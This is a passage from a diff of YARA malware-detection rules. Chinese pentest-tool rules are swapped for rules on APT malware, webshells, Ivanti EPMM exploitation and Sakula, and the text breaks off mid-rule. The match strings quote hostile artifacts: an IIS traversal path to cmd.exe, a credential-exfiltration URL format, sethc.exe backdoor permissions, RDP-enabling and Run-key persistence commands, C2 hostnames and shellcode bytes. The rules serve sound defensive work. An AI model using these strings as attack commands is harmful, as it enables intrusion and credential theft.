-		id = "16bed1e8-a1f0-5fcf-9c03-83625a388547"
-		date = "2015-06-23"
+		id = "dcf28185-75a8-5c9f-9f60-edb8dc187e16"
+		date = "2015-04-03"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2019-L2034"
+		reference = "http://goo.gl/5vYaNb"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volatile_cedar.yar#L14-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6c90a9ed4c8a141a343dab1b115cc840a7190304"
-		logic_hash = "dd37765488f07299048e9b8fc552120e76d628e0adcaf474fce9bfe60774a0c8"
+		hash = "c97693ecb36247bdb44ab3f12dfeae8be4d299bb"
+		logic_hash = "f559880c182cf8061d640f60f18fe607d88a1f22216d93ff1d0ece720bcc94a7"
 		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "id:uid:user:username:password:access:account:accounts:admin_id:admin_name:admin_" ascii
-		$s1 = "Created By WebCruiser - Web Vulnerability Scanner http://sec4app.com" fullword wide
+		$s5 = "REG ADD \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
+		$s9 = "WinAutologon From Winlogon Reg" fullword ascii
+		$s10 = "82BD0E67-9FEA-4748-8672-D5EFE5B779B0" fullword ascii
+		$s11 = "IE:Password-Protected sites" fullword ascii
+		$s12 = "\\his.sys" ascii
+		$s13 = "HTTP Password" fullword ascii
+		$s14 = "\\data.sys" ascii
+		$s15 = "EL$_RasDefaultCredentials#0" fullword wide
+		$s17 = "Office Outlook HTTP" fullword ascii
+		$s20 = "Hist :<b> %ws</b>  :%s </br></br>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
+		all of them and uint16( 0 ) == 0x5A4D
 }
-rule SIGNATURE_BASE_CN_Honker_Hookmsgina : FILE
+rule SIGNATURE_BASE_Explosion_Sample_2 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Hookmsgina.dll"
+		description = "Explosion/Explosive Malware - Volatile Cedar APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "77813637-ec9f-599c-90c9-be1dd93b45f7"
-		date = "2015-06-23"
+		id = "8be7ed50-0bfc-5302-b4fa-8817bf1750d7"
+		date = "2015-04-03"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2036-L2053"
+		reference = "http://goo.gl/5vYaNb"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volatile_cedar.yar#L40-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f4d9b329b45fbcf6a3b9f29f2633d5d3d76c9f9d"
-		logic_hash = "1e268624a5f8df200ef1a03ce167f38feda59836a864e17297473ba223c5895a"
+		hash = "62fe6e9e395f70dd632c70d5d154a16ff38dcd29"
+		logic_hash = "db7ead96e0a9b4cf5c5cc885eac421cc11988f60d03f94de5fe828899d115bf0"
 		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\\\.\\pipe\\WinlogonHack" fullword ascii
-		$s2 = "%s?host=%s&domain=%s&user=%s&pass=%s&port=%u" fullword ascii
-		$s3 = "Global\\WinlogonHack_Load%u" fullword ascii
-		$s4 = "Hookmsgina.dll" fullword ascii
+		$s0 = "serverhelp.dll" fullword wide
+		$s1 = "Windows Help DLL" fullword wide
+		$s5 = "SetWinHoK" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		all of them and uint16( 0 ) == 0x5A4D
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_Xp3389 : FILE
+rule SIGNATURE_BASE_Explosion_Generic_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file xp3389.exe"
+		description = "Generic Rule for Explosion/Explosive Malware - Volatile Cedar APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "75d23c63-ba9e-55fd-90fe-5e054d28a777"
-		date = "2015-06-23"
+		id = "dc3721b6-c19e-5449-9962-2a6f844e49b4"
+		date = "2015-04-03"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2055-L2071"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volatile_cedar.yar#L59-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d776eb7596803b5b94098334657667d34b60d880"
-		logic_hash = "7fd7947a802a65dfd63ece3fc6eaf2da8207e99276a9f6b1ff2c937cf4327945"
+		logic_hash = "8b6e1e6aa838036989040dfbf4f6f3e347a717967deef740b35d1752b5c91da5"
 		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "d0f059ba21f06021579835a55220d1e822d1233f95879ea6f7cb9d301408c821"
+		hash1 = "1952fa94b582e9af9dca596b5e51c585a78b8b1610639e3b878bbfa365e8e908"
+		hash2 = "d8fdcdaad652c19f4f4676cd2f89ae834dbc19e2759a206044b18601875f2726"
+		hash3 = "e2e6ed82703de21eb4c5885730ba3db42f3ddda8b94beb2ee0c3af61bc435747"
+		hash4 = "03641e5632673615f23b2a8325d7355c4499a40f47b6ae094606a73c56e24ad0"
 
 	strings:
-		$s1 = "echo \"fdenytsconnections\"=dword:00000000 >> c:\\reg.reg" fullword ascii
-		$s2 = "echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server] >" ascii
-		$s3 = "echo \"Tsenabled\"=dword:00000001 >> c:\\reg.reg" fullword ascii
+		$s0 = "autorun.exe" fullword
+		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; MSIE 6.0; Windows NT 5.1; .NET CL"
+		$s2 = "%drp.exe" fullword
+		$s3 = "%s_%s%d.exe" fullword
+		$s4 = "open=autorun.exe" fullword
+		$s5 = "http://www.microsoft.com/en-us/default.aspx" fullword
+		$s10 = "error.renamefile" fullword
+		$s12 = "insufficient lookahead" fullword
+		$s13 = "%s %s|" fullword
+		$s16 = ":\\autorun.exe" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
+		7 of them and uint16( 0 ) == 0x5A4D
 }
-rule SIGNATURE_BASE_CN_Honker_Cookiesview : FILE
+rule SIGNATURE_BASE_Explosive_UA : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file CookiesView.exe"
+		description = "Explosive Malware Embedded User Agent - Volatile Cedar APT http://goo.gl/HQRCdw"
 		author = "Florian Roth (Nextron Systems)"
-		id = "71a43797-4b5b-5f87-a70e-ebabc00d9319"
-		date = "2015-06-23"
+		id = "d88d5fd6-adf9-5ced-8b79-e47e3ffbde50"
+		date = "2015-04-03"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2073-L2089"
+		reference = "http://goo.gl/HQRCdw"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volatile_cedar.yar#L90-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c54e1f16d79066edfa0f84e920ed1f4873958755"
-		logic_hash = "9711bb15f08c18ba068325d1cca0ded8e252ded4ceddfb134d1317ad8a19fbe8"
-		score = 70
+		logic_hash = "9ed7fedcf9cda868803c8ace393e08709a747b909178e19cdbb1b116edbb82f9"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "V1.0  Http://www.darkst.com Code:New4" fullword ascii
-		$s1 = "maotpo@126.com" fullword ascii
-		$s2 = "www.baidu.com" fullword ascii
+		$x1 = "Mozilla/4.0 (compatible; MSIE 7.0; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 640KB and all of them
+		$x1 and uint16( 0 ) == 0x5A4D
 }
-rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V4_LPK : FILE
+rule SIGNATURE_BASE_Webshell_Caterpillar_ASPX
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
+		description = "Volatile Cedar Webshell - from file caterpillar.aspx"
 		author = "Florian Roth (Nextron Systems)"
-		id = "808f5de2-1360-521e-8939-b759e361507c"
-		date = "2015-06-23"
+		id = "9af48c64-3768-5765-8245-38df000598a7"
+		date = "2015-04-03"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2091-L2108"
+		reference = "http://goo.gl/emons5"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volatile_cedar.yar#L106-L126"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2b2ab50753006f62965bba83460e3960ca7e1926"
-		logic_hash = "a7382d61b53706ad51b36bc686a1c3f0018ee111bdc8ae9b05af144230dfbba3"
-		score = 70
+		logic_hash = "9df2e4a25052136d6e622273f917bd15df410869a8cf3075c773a14ea62a2a55"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "af4c99208fb92dc42bc98c4f96c3536ec8f3fe56"
 
 	strings:
-		$s1 = "http://127.0.0.1/1.exe" fullword wide
-		$s2 = "FreeHostKillexe.exe" fullword ascii
-		$s3 = "\\sethc.exe /G everyone:F" ascii
-		$s4 = "c:\\1.exe" fullword ascii
+		$s0 = "Dim objNewRequest As WebRequest = HttpWebRequest.Create(sURL)" fullword
+		$s1 = "command = \"ipconfig /all\"" fullword
+		$s3 = "For Each xfile In mydir.GetFiles()" fullword
+		$s6 = "Dim oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword
+		$s10 = "recResult = adoConn.Execute(strQuery)" fullword
+		$s12 = "b = Request.QueryString(\"src\")" fullword
+		$s13 = "rw(\"<a href='\" + link + \"' target='\" + target + \"'>\" + title + \"</a>\")" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Scanhistory : FILE
+rule SIGNATURE_BASE_MAL_Backdoor_Naikon_APT_Sample1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ScanHistory.exe"
+		description = "Detects backdoors related to the Naikon APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "85585cd2-c5ed-5465-bcac-b61211570055"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2110-L2126"
+		id = "ba79285b-7c7f-5b19-837e-6696e50a2866"
+		date = "2015-05-14"
+		modified = "2023-01-06"
+		reference = "https://goo.gl/7vHyvh"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_naikon.yar#L2-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "14c31e238924ba3abc007dc5a3168b64d7b7de8d"
-		logic_hash = "657a25b5103799446fa88abda39d36a05e080c18d41e9dd98199b506f2bfc419"
-		score = 70
+		hash = "d5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba"
+		hash = "f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96"
+		logic_hash = "e582fc3518dab2392a79909b5369c48656b6f280b915fad4befb0839ec7ce1bd"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "ScanHistory.exe" fullword wide
-		$s2 = ".\\Report.dat" fullword wide
-		$s3 = "select  * from  Results order by scandate desc" fullword wide
+		$x0 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" fullword ascii
+		$x1 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" fullword ascii
+		$x2 = "greensky27.vicp.net" fullword ascii
+		$x3 = "\\tempvxd.vxd.dll" wide
+		$x5 = "otna.vicp.net" fullword ascii
+		$s1 = "User-Agent: webclient" fullword ascii
+		$s2 = "\\User.ini" ascii
+		$s3 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200" ascii
+		$s4 = "\\UserProfile.dll" wide
+		$s5 = "Connection:Keep-Alive: %d" fullword ascii
+		$s6 = "Referer: http://%s:%d/" ascii
+		$s7 = "%s %s %s %d %d %d " fullword ascii
+		$s8 = "%s--%s" fullword wide
+		$s9 = "Run File Success!" fullword wide
+		$s10 = "DRIVE_REMOTE" fullword wide
+		$s11 = "ProxyEnable" fullword wide
+		$s12 = "\\cmd.exe" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 7 of ( $s* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Invasionerasor : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Ivanti_EPMM_Mobileiron_Core_CVE_2023_35078_Jul23_1 : CVE_2023_35078
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file InvasionErasor.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "03ccb643-9f92-5278-a358-65f56cf19ccc"
-		date = "2015-06-23"
+		description = "Detects the successful exploitation of Ivanti Endpoint Manager Mobile (EPMM) / MobileIron Core CVE-2023-35078"
+		author = "Florian Roth"
+		id = "44cca0b5-3851-5786-82fd-ce3ccb566453"
+		date = "2023-07-25"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2128-L2146"
+		reference = "Ivanti Endpoint Manager Mobile (EPMM) CVE-2023-35078 - Analysis Guidance"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_ivanti_epmm_mobileiron_cve_2023_35078.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b37ecd9ee6b137a29c9b9d2801473a521b168794"
-		logic_hash = "d2f742693682e9409284706a3eb63536a576cb162629bf76bfabf2e0210984a3"
-		score = 70
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "ebc59032b7450aa438ca30170560c95550cda6ff7774b8ce1486309716da9e6c"
+		score = 75
+		quality = 60
+		tags = "CVE-2023-35078"
 
 	strings:
-		$s1 = "c:\\windows\\system32\\config\\*.*" fullword wide
-		$s2 = "c:\\winnt\\*.txt" fullword wide
-		$s3 = "Command1" fullword ascii
-		$s4 = "Win2003" fullword ascii
-		$s5 = "Win 2000" fullword ascii
+		$xr1 = /\/mifs\/aad\/api\/v2\/[^\n]{1,300} 200 [1-9][0-9]{0,60} /
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
+		$xr1
 }
-rule SIGNATURE_BASE_CN_Honker_Super_Injection1 : FILE
+rule SIGNATURE_BASE_MAL_WAR_Ivanti_EPMM_Mobileiron_Mi_War_Aug23 : CVE_2023_35078 FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file super Injection1.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ad84c5a0-4f03-5040-bdf7-819b40a08ad2"
-		date = "2015-06-23"
+		description = "Detects WAR file found in the Ivanti EPMM / MobileIron Core compromises exploiting CVE-2023-35078"
+		author = "Florian Roth"
+		id = "cd16cf29-a90d-5c3f-b66f-e9264dbf79fb"
+		date = "2023-08-01"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2148-L2164"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_ivanti_epmm_mobileiron_cve_2023_35078.yar#L16-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8ff2df40c461f6c42b92b86095296187f2b59b14"
-		logic_hash = "11a3628b7c34a34dc37604430195e24063d3f0dd0889d6d782ce0ee42cafbb02"
-		score = 70
+		logic_hash = "0083727e34118d628c8507459bfb7f949f11af8197e201066e29e263e2c3f944"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-35078, FILE"
+		hash1 = "6255c75e2e52d779da39367e7a7d4b8d1b3c9c61321361952dcc05819251a127"
 
 	strings:
-		$s2 = "Invalid owner=This control requires version 4.70 or greater of COMCTL32.DLL" fullword wide
-		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
-		$s4 = "ScanInject.log" fullword ascii
+		$s1 = "logsPaths.txt" ascii fullword
+		$s2 = "keywords.txtFirefox" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		uint16( 0 ) == 0x4b50 and filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Pk_Pker : FILE
+rule SIGNATURE_BASE_MAL_WAR_Ivanti_EPMM_Mobileiron_Logclear_JAVA_Aug23 : CVE_2023_35078 FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Pker.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dff0e4fb-6b2e-5fa8-910d-63a9e5030b95"
-		date = "2015-06-23"
+		description = "Detects LogClear.class found in the Ivanti EPMM / MobileIron Core compromises exploiting CVE-2023-35078"
+		author = "Florian Roth"
+		id = "e1ef3bf3-0107-5ba6-a49f-71e079851a4f"
+		date = "2023-08-01"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2166-L2186"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_ivanti_epmm_mobileiron_cve_2023_35078.yar#L34-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "631787f27f27c46f79e58e1accfcc9ecfb4d3a2f"
-		logic_hash = "ea29bc82131751f0aaa4f10cc7576a27d243fb7dade03db7ae3dcb029b306505"
-		score = 70
+		logic_hash = "c42c2eca784d7089aab56addca11bad658a4a6c34a81ae823bd0c3dad41a1c99"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-35078, FILE"
+		hash1 = "deb381c25d7a511b9eb936129eeba2c0341cff7f4bd2168b05e40ab2ee89225e"
 
 	strings:
-		$s1 = "/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe" fullword wide
-		$s2 = "msadc/..\\..\\..\\..\\winnt/system32/cmd.exe" fullword wide
-		$s3 = "--Made by VerKey&Only_Guest&Bincker" fullword wide
-		$s4 = ";APPLET;EMBED;FRAMESET;HEAD;NOFRAMES;NOSCRIPT;OBJECT;SCRIPT;STYLE;" fullword wide
-		$s5 = " --Welcome to Www.Pker.In Made by V.K" fullword wide
-		$s6 = "Report.dat" fullword wide
-		$s7 = ".\\Report.dat" fullword wide
+		$s1 = "logsPaths.txt" ascii fullword
+		$s2 = "log file: %s, not read" ascii fullword
+		$s3 = "/tmp/.time.tmp" ascii fullword
+		$s4 = "readKeywords" ascii fullword
+		$s5 = "\"----------------  ----------------" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 5 of them
+		uint16( 0 ) == 0xfeca and filesize < 20KB and 4 of them or all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Getpass_Getpass : FILE
+rule SIGNATURE_BASE_Malware_Sakula_Xorloop : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file GetPass.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "999d0ac0-a112-53db-9dbe-10fa4419cfae"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2188-L2204"
+		description = "XOR loops from Sakula malware"
+		author = "David Cannings"
+		id = "9349b7e4-560c-5d8b-94d9-cbb9fd09e132"
+		date = "2016-06-13"
+		modified = "2023-01-27"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sakula.yar#L1-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
-		logic_hash = "90d802da512f5d460eda6d644660711601d361e2402522d085d3225931a3fca3"
-		score = 70
+		hash = "fc6497fe708dbda9355139721b6181e7"
+		logic_hash = "b3c3131693e18ce2cf26786a93b61d39d90703d8c827de1340f85377fe7b59de"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\only\\Desktop\\" ascii
-		$s2 = "To Run As Administuor" ascii
-		$s3 = "Key to EXIT ... & pause > nul" fullword ascii
+		$opcodes_decode_loop01 = { 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B }
+		$opcodes_decode_loop02 = { 8B 45 08 8D 0C 02 8A 01 84 C0 74 08 3C ?? 74 04 34 ?? 88 01 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		uint16( 0 ) == 0x5A4D and any of ( $opcodes* )
 }
-rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_Blackmoon_Jun15 : FILE
+rule SIGNATURE_BASE_Malware_Sakula_Memory
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file f4ck.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "df12daca-8e03-5382-b71d-96a747d3a043"
-		date = "2015-06-23"
+		description = "Sakula malware - strings after unpacking (memory rule)"
+		author = "David Cannings"
+		id = "328e3707-d11d-5b7f-bec4-18a42a2c658b"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		old_rule_name = "CN_Honker_F4ck_Team_f4ck_3"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2206-L2227"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sakula.yar#L20-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7e3bf9b26df08cfa10f10e2283c6f21f5a3a0014"
-		logic_hash = "85db31c6bca6e5ddd45168a3adbc382d5a9e8128e0b2a6ed5efe1a2fcd42ff3d"
-		score = 70
+		hash = "b3852b9e7f2b8954be447121bb6b65c3"
+		logic_hash = "ba6d93a1fc5fd81748eb462fc55b681987126ba853ddb677a5f1f9b74ba5cde8"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "File UserName PassWord [comment] /add" fullword ascii
-		$s2 = "No Net.exe Add User" fullword ascii
-		$s3 = "BlackMoon RunTime Error:" fullword ascii
-		$s4 = "Team.F4ck.Net" fullword wide
-		$s5 = "admin 123456789" fullword ascii
-		$s6 = "blackmoon" fullword ascii
-		$s7 = "f4ck Team" fullword wide
+		$str01 = "cmd.exe /c ping 127.0.0.1 & del \"%s\""
+		$str02 = "cmd.exe /c rundll32 \"%s\" Play \"%s\""
+		$str03 = "Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+SV1)"
+		$str04 = "cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c \"%s\""
+		$str05 = "Self Process Id:%d"
+		$str06 = "%d_%d_%d_%s"
+		$str07 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
+		$str08 = "cmd.exe /c rundll32 \"%s\" ActiveQvaw \"%s\""
+		$opcodes01 = { 83 F9 00 74 0E 31 C0 8A 03 D0 C0 34 ?? 88 03 49 43 EB ED }
+		$opcodes02 = { 31 C0 8A 04 13 32 01 83 F8 00 75 0E 83 FA 00 74 04 49 4A }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them
+		4 of them
 }
-rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_F4Ck_3 : FILE
+rule SIGNATURE_BASE_Malware_Sakula_Shellcode
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file F4ck_3.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1767669f-47d0-5d6e-97a5-92522f988102"
-		date = "2015-06-23"
+		description = "Sakula shellcode - taken from decoded setup.msi but may not be unique enough to identify Sakula"
+		author = "David Cannings"
+		id = "147e4894-7877-5367-9f6b-588eb7f0379a"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2229-L2248"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sakula.yar#L47-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0b3e9381930f02e170e484f12233bbeb556f3731"
-		logic_hash = "870d22be85da127b3ebfd3f8ec547b6ad1cdc8048b56aea494e8d2643bd61d77"
-		score = 70
+		logic_hash = "0e84d91cd1bb0455ac7d2ca78583510388f39cebd95523c5f6f173a50e0c1951"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "F4ck.exe" fullword wide
-		$s2 = "@Netapi32.dll" fullword ascii
-		$s3 = "Team.F4ck.Net" fullword wide
-		$s6 = "NO Net Add User" fullword wide
-		$s7 = "DLL ERROR" fullword ascii
-		$s11 = "F4ck Team" fullword wide
+		$opcodes01 = { 55 89 E5 E8 00 00 00 00 58 83 C0 06 C9 C3 }
+		$opcodes02 = { 8B 5E 3C 8B 5C 1E 78 8B 4C 1E 20 53 8B 5C 1E 24 01 F3 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
+		any of them
 }
-rule SIGNATURE_BASE_CN_Honker_ACCESS_Brute : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_LNX_Macos_Lockbit_Apr23_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ACCESS_brute.exe"
-		author = "Florian Roth (Nextron Systems)"
